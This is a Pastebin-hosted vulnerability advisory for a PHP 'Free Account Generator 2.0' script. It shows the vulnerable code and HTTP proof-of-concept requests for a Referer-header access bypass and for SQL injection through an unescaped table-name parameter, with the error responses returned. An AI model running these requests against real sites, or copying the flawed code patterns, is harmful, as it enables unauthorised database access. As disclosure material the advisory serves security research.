API tools faq
paste
R007ME

HackForums FAG 2.0

R007ME
Feb 19th, 2017
126
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.44 KB | None | 0 0
raw download clone embed print report
  1. ==============================================================================================
  2. [-] Title => HackForums FAG 2.0 - Multiple Vulnerabilities
  3.  
  4. [-] Author => DigiGang (digitalgangster@lelantos.org)
  5.  
  6. [-] Date Release => 22 August, 2016
  7.  
  8. [-] Vendor => HackForums, froy0z
  9. Title => Free Account Generator 2.0
  10. Thread Post => http://hackforums.net/showthread.php?tid=4882268
  11. Download => https://mega.nz/#!SdMSGaZY!XYCeFoYlX0FdDazJ_Q2TpjWOUBh37jvX3kJWSX6UsUA
  12. Vulnerable Version => 2.0
  13. Tested Version => Latest, 2.0 on a Wamp Server
  14. ==============================================================================================
  15.  
  16.  
  17.  
  18.  
  19.  
  20.  
  21.  
  22. Vulnerability #1 : Using the generator without even registration or purchasing a membership.
  23. Vuln File: /lib/generate.php
  24. Vuln Code: Line 3-6
  25.  
  26. /*********************************************************************************
  27. 3. $pos = strpos($_SERVER['HTTP_REFERER'],getenv('HTTP_HOST'));
  28. 4. if($pos===false){
  29. 5. die('No Access');
  30. 6. }
  31. *********************************************************************************/
  32.  
  33. strpos checks if the HTTP_REFERER matches with HTTP_HOST before generating data
  34. which make it possible for anyone to use the generator by simply changing the referer.
  35.  
  36.  
  37. [-] Proof Of Concept [-]
  38.  
  39.  
  40.  
  41. http://localhost/lib/generate.php?generator=1
  42.  
  43. Host: localhost
  44. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
  45. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  46. Accept-Language: en-US,en;q=0.5
  47. Accept-Encoding: gzip, deflate
  48. Connection: keep-alive
  49. If-None-Match: 1
  50. Upgrade-Insecure-Requests: 1
  51.  
  52.  
  53. Response:
  54. No Access
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
  61. [bypass]
  62.  
  63. http://localhost/lib/generate.php?generator=1
  64.  
  65. Host: localhost
  66. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
  67. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  68. Accept-Language: en-US,en;q=0.5
  69. Accept-Encoding: gzip, deflate
  70. Referer: http://localhost/lib/generate.php?generator=1
  71. Connection: keep-alive
  72. If-None-Match: 1
  73. Upgrade-Insecure-Requests: 1
  74.  
  75.  
  76. Response:
  77. test@account.com:123123
  78.  
  79.  
  80.  
  81.  
  82.  
  83.  
  84. --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  85. Vulnerability #2 : SQL Injection
  86. Vuln File: /lib/generate.php
  87. Vuln Code: Line 10 & 34-40
  88.  
  89. /******************************************************************************************************************************************************************
  90. 10. $generator = mysqli_real_escape_string($con, $_GET['generator']);
  91.  
  92. 34. $result = mysqli_query($con, "SELECT * FROM `generator$generator` WHERE `status` != '0' ORDER BY RAND() LIMIT 1") or die(mysqli_error($con));
  93. 35. if(mysqli_num_rows($result) < 1){
  94. 36. exit("0 Accounts in stock");
  95. 37. }
  96. 38. while($row = mysqli_fetch_array($result)){
  97. 39. echo $row['alt'];
  98. 40. }
  99. ******************************************************************************************************************************************************************/
  100.  
  101.  
  102. The mysqli_query use the parameter 'generator' in the SQL query, which makes it possible to interfer and send malicious commands to the DBMS.
  103.  
  104.  
  105.  
  106.  
  107.  
  108.  
  109.  
  110. [-] Proof Of Concept [-]
  111.  
  112.  
  113. http://localhost/lib/generate.php?generator=1+3
  114. Host: localhost
  115. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
  116. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  117. Accept-Language: en-US,en;q=0.5
  118. Accept-Encoding: gzip, deflate
  119. Referer: http://localhost/lib/generate.php?generator=1+3
  120. Connection: keep-alive
  121. Upgrade-Insecure-Requests: 1
  122. If-None-Match: 1
  123.  
  124.  
  125.  
  126. Response:
  127. Table 'FAG_2sql1.generator1 3' doesn't exist
  128.  
  129.  
  130.  
  131.  
  132. http://localhost/lib/generate.php?generator=1`+TEST
  133. Host: localhost
  134. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
  135. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  136. Accept-Language: en-US,en;q=0.5
  137. Accept-Encoding: gzip, deflate
  138. Referer: http://localhost/lib/generate.php?generator=1`+TEST
  139. Connection: keep-alive
  140. Upgrade-Insecure-Requests: 1
  141. If-None-Match: 1
  142.  
  143. Response:
  144. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '` WHERE `status` != '0' ORDER BY RAND() LIMIT 1' at line 1
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!